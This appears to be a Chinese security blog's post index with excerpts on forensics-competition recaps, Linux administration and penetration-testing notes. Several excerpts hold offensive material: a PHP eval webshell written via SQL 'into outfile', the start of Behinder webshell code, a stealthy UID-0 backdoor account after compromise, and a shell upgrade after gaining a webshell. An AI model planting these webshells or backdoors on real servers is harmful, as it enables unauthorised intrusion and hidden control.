qq_29566629的博客

原创 2023美亚杯个人赛复盘（三）

94. 参考’Windows 7’文件夹回答以下题目，在Windows 7中\Users\Allen\Downloads内有mp3文件(miracle.mp3)，mp3文件更改名称前的名称是什么？参考’Windows 7’ 文件夹回答以下题目，在Windows 7中，potplayer最后播放的文件名？93. 参考’Windows 7’文件夹回答以下题目，在 Windows 7中\Users\Allen\Downloads内有mp3文件(miracle.mp3)，更改名称时间？

原创 2023美亚杯个人赛复盘（二）

2023月8月的一天，香港警方在调查一起网络诈骗案件时，发现有三名本地男子，分別为李大輝（李大辉），浩賢(浩贤)和Elvis CHUI，并确信这三名被捕男子均为大学同学。13. 参考Server文件夹下的 ’ Meiya_VPN.vmdk ’ 回答以下题目，这个访问服务器的“openvpn”帐户密码是多少？提示:请用大写字母与阿拉伯数字作答。14. 参考Server文件夹下的 ’ Meiya_VPN.vmdk '回答以下题目，在这个访问服务器中，“User1”账户之间的连接所使用的加密算法（密码）是什么？

原创 2023美亚杯个人赛复盘（一）火眼+取证大师

参考’Window Artifacts.E01’内的Windows注册表回答以下题目，计算机有一个正在连接的网络接口，该接口连接DHCP服务器的IP地址是多少？37. 参考’Window Artifacts.E01’内的Windows注册表回答以下题目，计算机内的OneDrive程序版本是什么？参考’Window Artifacts.E01’内的Windows注册表回答以下题目，该计算机的操作系统是在哪一个时区？8.来自Elvis Chui计算机的镜像文件 (Windows Artifacts.e01)

原创 docker的网络模式

讲的非常好。

原创 linux中yum和rpm的联系和区别

这篇讲的非常好

原创 linux watch命令

在Linux中，有时需要每隔一段时间比如一秒或者两秒刷新一次，这时就可以使用watch 命令。每隔两秒刷新查看一下磁盘使用情况。

原创 VMware共享文件夹

在centos里，完成上述操作后会生成一个目录 /mnt/hgfs 宿主机里的文件就在这个目录里可以看到并使用了。

原创 nmap探索存在主机

nmap -sP 10.1.0.1/24Ping扫描：只进行Ping，然后显现出在线（做出响应）的主机，使用该选项扫描可以轻易地获取目标信息而不会被轻易发现。在默认情况下，Nmap会发送一个ICMP回声请求和一个TCP报文到目标端口。Ping扫描的优点：不会返回太多的信息造成对结果的分析，并且这是一种非常高效的扫描方式。

原创 使用earthworm进行socks代理

网址

原创 adb 拉取已安装应用的APK文件

原创 windows下通过命令行taskkill终止进程

taskkill

原创 linux wc命令

wc命令

转载 nginx目录简介

nginx目录

原创 通过sql语句统计特定字段出现次数并排序

sql

原创 http 302状态码

http 302

原创 mysql 盲注常见函数

mysql盲注常见函数

原创 wieshark抓包mysql协议简单分析

mysql协议分析

原创 burp抓取mumu模拟器里安装应用的流量（含https）

burp抓取mumu模拟器流量

原创 Java keytool查看证书信息

Java keytool工具查看证书信息

原创 mysql 备份与还原

mysql 备份和还原

原创 linux 取证知识点

linux取证

原创 python命令行读取输入参数

python命令行

原创 Content-Type: multipart/form-data； boundary=${bound}

其中${bound}是一个占位符，代表我们规定的分隔符，为了表示独一性，一般都会复杂一点。

原创 http协议中的Accept请求首部

所有带有Accept的请求字段都表示浏览器可以接受和首先处理的数据类型

原创 Git信息泄露漏洞

对域名进行目录扫描时，如果发现有.git就说明有可能存在git信息泄露。然后就可以试着使用GitHack（github上有）dump下源码

转载 Linux系统中的文件的s权限

http://blog.chinaunix.net/uid-20809581-id-3141879.html

原创 linux中赋予普通用户root权限的三种方式

前言在成功拿下一个服务器并提权成为root用户以后，为了减少root用户使用时间从而减少被网站管理员发现的概率，就需要新建一个普通用户，并赋予其完全的管理员权限，有以下三种常见的方式三种方式1. 直接修改/etc/passwd文件/etc/passwd文件里的第三列是UID，这个值为0的话就表示这个用户具有完全的管理员权限，所以新建一个用户后只需要把这个值置为0就可以：如图的ning这个账户，只是更改了UID，现在验证一下是否具有了root权限：可以看到，能打开/etc/shadow这个文件

原创 linux sudo简介

为什么需要sudo？在linux中，如果你是普通用户，想要执行管理员才有权限的命令，那么大概有以下三种途径：通过su - root 命令切换为root用户，这时必须知道root的密码（可能造成root用户的泄露）把自己加入到root 组中通过配置/etc/sudoers把自己加入到sudo中如何配置/etc/sudoers？如图，显然root用户可以使用sudo命令，-u参数指定用户。而当使用test1账户执行sudo时：显示不是sudoers file当然也没有创建用户的权利：

原创 linux 账户管理之用户管理

ID 范围说明：0 ：系统管理员：当 UID 是 0 时，代表这个账号是『系统管理员』！ 所以当你要让其他的账号名称也具有 root 的权限时，将该账号的 UID 改为 0 即可。 这也就是说，一部系统上面的系统管理员不见得只有 root 喔！ 不过，很不建议有多个账号的 UID 是 0。1-499：系统账号：保留给系统使用的 ID，其实除了 0 之外，其他的 UID 权限与特性并没有不一样。默认 500 以下的数字让给系统作为保留账号只是一个习惯，由于系统上面启动的服务希望使用较小的权限去运行，因此不

原创 拿到webshell后利用python改变shell类型

使用一条命令即可：python -c ‘import pty;pty.spawn(“/bin/bash”)’'''-c 后跟命令，也就是说后面引号里的内容相当于会执行的代码pty 模块定义了一些处理“伪终端”概念的操作：启动另一个进程并能以程序方式在其控制终端中进行读写。pty.spawn(argv[, master_read[, stdin_read]])生成一个进程，并将其控制终端连接到当前进程的标准 io。 这常被用来应对坚持要从控制终端读取数据的程序。'''所以在靶机里存在Pyth

原创 kali（linux） smbclient用法

Smb一般作为文件共享服务器，专门提供Linux与Windows之间的传送文件服务，在kali linux中提供了专用的客户端smbclient 下面就介绍一下其简单用法如图：-U 后面跟用户名和密码，如果没有则不需要加-U如图就可以使用linux的ls等命令进行操作了。3. get命令用来下载...

原创 550 Mailbox not found or access denied

今天处理了一个生产问题，有个同事发出的邮件失败，返回码为550 Mailbox not found or access denied，排除发送邮箱问题之后，发现有以下原因：1.2. 没有这个邮箱

原创 冰蝎新老版本使用方式注意事项

前言今天遇到一个很奇怪的问题，冰蝎在使用过程中明明马上传的也正确，就是连接不上，后来才发现是新版3.x和旧版2.x使用的马不一样导致的结果，先记录如下（以PHP为例）：旧版的马：<?php@error_reporting(0);session_start();if (isset($_GET['pass'])){ $key=substr(md5(uniqid(rand())),16); $_SESSION['k']=$key; print $key;}else

原创 linux中的管道符“|”

这里有一点需要注意，就是命令1的正确输出，错误输出不会被作为命令B的输入

原创 CC攻击初识

原创 MongoDB 初识

和redis一样，是一种nosql数据库，默认端口是27017mongocola是一种图形化的管理工具：MongoDB安装时不添加任何参数,默认是不开启权限验证的,登录的用户可以对数据库任意操作而且可以远程访问数据库。在刚安装完毕的时候MongoDB都默认有一个admin数据库,此时admin数据库是空的,没有记录权限相关的信息。当admin.system.users一个用户都没有时，即使开启了权限验证,如果没有在admin数据库中添加用户,此时不进行任何认证还是可以做任何操作,直到在admin.

转载 数据库 CURB

CRUD是指在做计算处理时的增加**(Create**)、读取查询(Retrieve)、更新(Update)和删除(Delete)几个单词的首字母简写。主要被用在描述软件系统中DataBase或者持久层的基本操作功能。

原创 linux 数据流重定向

需要注意的知识点：linux提供了垃圾桶机制： 有时候我们需要将信息统统丢掉，不显示到屏幕，也不记录到如何文件，有什么办法呢？当然有，在我们的linux中，有一个设备 /dev/null ，也就是空设备的意思，它就像一个黑洞，任何东西进入它都会消失。所有我们只需要将数据流重定向指这个设备就行了。上图表示把错误输出到垃圾桶里。&>可以将错误信息或者普通信息都重定向输出...

原创 php setcookie

先看服务器端代码test.php：<?php $value = "my cookie"; setcookie("TestCookie",$value); echo "my cookie is".$value; ?>访问时抓包

原创 select into outfile

这个功能在写入shell的过程中可以试试，比如：select ‘<?php @eval($_POST[value]);?>’ into outfile ‘c://phpstudy//www//shell.php’但是一般都会被禁止